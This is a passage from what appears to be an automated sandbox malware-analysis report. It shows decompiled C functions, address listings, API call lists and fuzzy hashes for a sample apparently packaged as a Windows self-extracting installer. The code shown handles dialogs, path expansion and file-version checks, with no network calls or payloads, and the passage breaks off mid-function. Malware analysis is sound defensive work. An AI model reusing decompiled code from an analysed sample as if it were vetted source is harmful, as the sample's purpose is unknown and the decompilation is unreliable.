                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0x3e91dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x003e3459
                                                                                                                                                                                                      0x003e345c
                                                                                                                                                                                                      0x003e34d8
                                                                                                                                                                                                      0x003e34de
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e34e0
                                                                                                                                                                                                      0x003e345e
                                                                                                                                                                                                      0x003e3463
                                                                                                                                                                                                      0x003e349a
                                                                                                                                                                                                      0x003e34a0
                                                                                                                                                                                                      0x003e34a7
                                                                                                                                                                                                      0x003e34b2
                                                                                                                                                                                                      0x003e34c4
                                                                                                                                                                                                      0x003e34cb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e34cb
                                                                                                                                                                                                      0x003e3468
                                                                                                                                                                                                      0x003e346e
                                                                                                                                                                                                      0x003e3474
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e347c
                                                                                                                                                                                                      0x003e348c
                                                                                                                                                                                                      0x003e3490
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3496
                                                                                                                                                                                                      0x003e3484
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3486
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3486
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 003E3490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E34B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 003E34C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 003E34CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 003E34D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: eeb447054edc7f9e653a296a74e98eb0dd9760d482ae5e74c839f8eb2f4deecf
                                                                                                                                                                                                      • Instruction ID: 7dc367e4abb59ce42d08796c54b7048e14236bc8ffd4197601ba2196c18c0d9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eeb447054edc7f9e653a296a74e98eb0dd9760d482ae5e74c839f8eb2f4deecf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58019E312405F4ABC7275F67DC4C9AD3A68EB49701F028615F9469BAE0CA30AF41CF82
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E003E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0x3e9a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E1680(_t65, E003E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E003E65E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E003E1680(_t65, E003E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x003e2aac
                                                                                                                                                                                                      0x003e2ab7
                                                                                                                                                                                                      0x003e2abc
                                                                                                                                                                                                      0x003e2abe
                                                                                                                                                                                                      0x003e2ac3
                                                                                                                                                                                                      0x003e2ac6
                                                                                                                                                                                                      0x003e2ac9
                                                                                                                                                                                                      0x003e2ace
                                                                                                                                                                                                      0x003e2ae6
                                                                                                                                                                                                      0x003e2bdc
                                                                                                                                                                                                      0x003e2bdc
                                                                                                                                                                                                      0x003e2be0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2af2
                                                                                                                                                                                                      0x003e2afc
                                                                                                                                                                                                      0x003e2b00
                                                                                                                                                                                                      0x003e2b05
                                                                                                                                                                                                      0x003e2b05
                                                                                                                                                                                                      0x003e2b0b
                                                                                                                                                                                                      0x003e2bca
                                                                                                                                                                                                      0x003e2bd1
                                                                                                                                                                                                      0x003e2b11
                                                                                                                                                                                                      0x003e2b18
                                                                                                                                                                                                      0x003e2b26
                                                                                                                                                                                                      0x003e2b99
                                                                                                                                                                                                      0x003e2bc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2b9b
                                                                                                                                                                                                      0x003e2bae
                                                                                                                                                                                                      0x003e2bb3
                                                                                                                                                                                                      0x003e2bb5
                                                                                                                                                                                                      0x003e2bb5
                                                                                                                                                                                                      0x003e2bb8
                                                                                                                                                                                                      0x003e2bb8
                                                                                                                                                                                                      0x003e2bba
                                                                                                                                                                                                      0x003e2bbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2bb8
                                                                                                                                                                                                      0x003e2b28
                                                                                                                                                                                                      0x003e2b2e
                                                                                                                                                                                                      0x003e2b33
                                                                                                                                                                                                      0x003e2b39
                                                                                                                                                                                                      0x003e2b3c
                                                                                                                                                                                                      0x003e2b3c
                                                                                                                                                                                                      0x003e2b3e
                                                                                                                                                                                                      0x003e2b3f
                                                                                                                                                                                                      0x003e2b55
                                                                                                                                                                                                      0x003e2b5d
                                                                                                                                                                                                      0x003e2b64
                                                                                                                                                                                                      0x003e2b64
                                                                                                                                                                                                      0x003e2b7a
                                                                                                                                                                                                      0x003e2b7f
                                                                                                                                                                                                      0x003e2b81
                                                                                                                                                                                                      0x003e2b81
                                                                                                                                                                                                      0x003e2b84
                                                                                                                                                                                                      0x003e2b84
                                                                                                                                                                                                      0x003e2b86
                                                                                                                                                                                                      0x003e2b87
                                                                                                                                                                                                      0x003e2bbf
                                                                                                                                                                                                      0x003e2bc1
                                                                                                                                                                                                      0x003e2bc1
                                                                                                                                                                                                      0x003e2b26
                                                                                                                                                                                                      0x003e2bda
                                                                                                                                                                                                      0x003e2bda
                                                                                                                                                                                                      0x003e2be6
                                                                                                                                                                                                      0x003e2be6
                                                                                                                                                                                                      0x003e2bf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 003E2AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 003E2AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 003E2B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 003E2B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 003E2B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 003E2BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: 941f9629a7d8c0a67e650aaf853f1764f0b4d9bb75dec806e0724a0019a8aafd
                                                                                                                                                                                                      • Instruction ID: 7b5237d4b7c733a716d73f8fe06cb110af466c63e5976529f452e4d4979f41bd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 941f9629a7d8c0a67e650aaf853f1764f0b4d9bb75dec806e0724a0019a8aafd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD4137345082E69EDF279F308C44AFE7B6D9F56300F05429AE8C28B2C2DB745E86CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E003E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t11 =  &_v32; // 0x3e3938
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									_t16 =  &_v32; // 0x3e3938
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E003E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E003E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x003e28f1
                                                                                                                                                                                                      0x003e28f4
                                                                                                                                                                                                      0x003e28f7
                                                                                                                                                                                                      0x003e28f9
                                                                                                                                                                                                      0x003e28fc
                                                                                                                                                                                                      0x003e28ff
                                                                                                                                                                                                      0x003e2901
                                                                                                                                                                                                      0x003e2907
                                                                                                                                                                                                      0x003e2a62
                                                                                                                                                                                                      0x003e2a64
                                                                                                                                                                                                      0x003e290d
                                                                                                                                                                                                      0x003e290d
                                                                                                                                                                                                      0x003e290f
                                                                                                                                                                                                      0x003e2912
                                                                                                                                                                                                      0x003e2920
                                                                                                                                                                                                      0x003e2937
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e293d
                                                                                                                                                                                                      0x003e2944
                                                                                                                                                                                                      0x003e294a
                                                                                                                                                                                                      0x003e294f
                                                                                                                                                                                                      0x003e2a2f
                                                                                                                                                                                                      0x003e2a32
                                                                                                                                                                                                      0x003e2a34
                                                                                                                                                                                                      0x003e2a37
                                                                                                                                                                                                      0x003e2a41
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2955
                                                                                                                                                                                                      0x003e295e
                                                                                                                                                                                                      0x003e2962
                                                                                                                                                                                                      0x003e2969
                                                                                                                                                                                                      0x003e296f
                                                                                                                                                                                                      0x003e2974
                                                                                                                                                                                                      0x003e297e
                                                                                                                                                                                                      0x003e298c
                                                                                                                                                                                                      0x003e2a20
                                                                                                                                                                                                      0x003e2a21
                                                                                                                                                                                                      0x003e2a27
                                                                                                                                                                                                      0x003e2a4c
                                                                                                                                                                                                      0x003e2a4f
                                                                                                                                                                                                      0x003e2a50
                                                                                                                                                                                                      0x003e2a53
                                                                                                                                                                                                      0x003e2a56
                                                                                                                                                                                                      0x003e2a5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e29b2
                                                                                                                                                                                                      0x003e29b2
                                                                                                                                                                                                      0x003e29b5
                                                                                                                                                                                                      0x003e29bd
                                                                                                                                                                                                      0x003e29c3
                                                                                                                                                                                                      0x003e29cc
                                                                                                                                                                                                      0x003e29d5
                                                                                                                                                                                                      0x003e29d7
                                                                                                                                                                                                      0x003e29da
                                                                                                                                                                                                      0x003e29dd
                                                                                                                                                                                                      0x003e29df
                                                                                                                                                                                                      0x003e29ec
                                                                                                                                                                                                      0x003e29f8
                                                                                                                                                                                                      0x003e29fc
                                                                                                                                                                                                      0x003e29ff
                                                                                                                                                                                                      0x003e2a02
                                                                                                                                                                                                      0x003e2a07
                                                                                                                                                                                                      0x003e2a0a
                                                                                                                                                                                                      0x003e2a0f
                                                                                                                                                                                                      0x003e2a19
                                                                                                                                                                                                      0x003e2a81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2a0f
                                                                                                                                                                                                      0x003e298c
                                                                                                                                                                                                      0x003e2974
                                                                                                                                                                                                      0x003e2962
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e294f
                                                                                                                                                                                                      0x003e2912
                                                                                                                                                                                                      0x003e2a65
                                                                                                                                                                                                      0x003e2a68
                                                                                                                                                                                                      0x003e2a6c
                                                                                                                                                                                                      0x003e2a6f
                                                                                                                                                                                                      0x003e2a6f
                                                                                                                                                                                                      0x003e2a7d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 003E2A6F
                                                                                                                                                                                                        • Part of subcall function 003E2773: CharUpperA.USER32(59D037E4,00000000,00000000,00000000), ref: 003E27A8
                                                                                                                                                                                                        • Part of subcall function 003E2773: CharNextA.USER32(0000054D), ref: 003E27B5
                                                                                                                                                                                                        • Part of subcall function 003E2773: CharNextA.USER32(00000000), ref: 003E27BC
                                                                                                                                                                                                        • Part of subcall function 003E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2829
                                                                                                                                                                                                        • Part of subcall function 003E2773: RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2852
                                                                                                                                                                                                        • Part of subcall function 003E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2870
                                                                                                                                                                                                        • Part of subcall function 003E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E28A0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,003E3938,?,?,?,?,-00000005), ref: 003E2958
                                                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 003E2969
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,003E3938,?,?,?,?,-00000005,?), ref: 003E2A21
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,003E3938,?,?), ref: 003E2A81
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                      • String ID: 89>
                                                                                                                                                                                                      • API String ID: 3949799724-450690347
                                                                                                                                                                                                      • Opcode ID: 3edc8f79b29d975ccb52e200ba7b3be425f81bc8b1f5a5ba344e405f9170ae5a
                                                                                                                                                                                                      • Instruction ID: 2e23d057014228d1a5f60314e5a6d2b8ce67147ceaec9509420e279ea1829762
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3edc8f79b29d975ccb52e200ba7b3be425f81bc8b1f5a5ba344e405f9170ae5a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2514E31D00269DFCB26DF99C884AAEFBB9FF48700F15422AE901E7291DB319D41DB90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E003E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                      				_t29 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
